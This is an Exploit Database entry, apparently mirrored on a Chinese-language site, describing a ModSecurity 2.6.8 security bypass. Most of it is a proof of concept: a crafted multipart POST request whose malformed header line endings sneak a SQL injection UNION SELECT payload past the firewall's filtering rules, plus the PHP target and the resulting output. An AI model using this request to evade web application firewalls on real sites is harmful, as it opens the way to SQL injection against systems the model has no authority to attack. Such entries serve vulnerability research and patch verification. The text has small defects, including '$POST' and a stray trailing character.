ModSecurity – ‘POST’ Security Bypass

• Exploit Database
• 22 阅读

• 作者： Bernhard Mueller
  日期： 2012-10-17
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/37949/

• source: https://www.securityfocus.com/bid/56096/info
  
  ModSecurity is prone to a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied input.
  
  Successful exploits can allow attackers to bypass filtering rules; this may aid in further attacks.
  
  ModSecurity 2.6.8 is vulnerable; other versions may also be affected. 
  
  Proof of concept:
  -----------------
  
  wut.php:
  --------
  
  <? echo $POST[xxx] ?>
  
  
  POST request:
  -------------
  
  POST /wut.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=A
  Content-Length: 161
  
  --A
  Content-Disposition: form-data; name="xxx"[\r][\r][\n]
  --A
  Content-Disposition: form-data; name="yyy"; filename="z"
  
  1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
  
  --A--
  
  
  Output:
  -------
  
  1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
  
  (any change in the header should produce a 403)d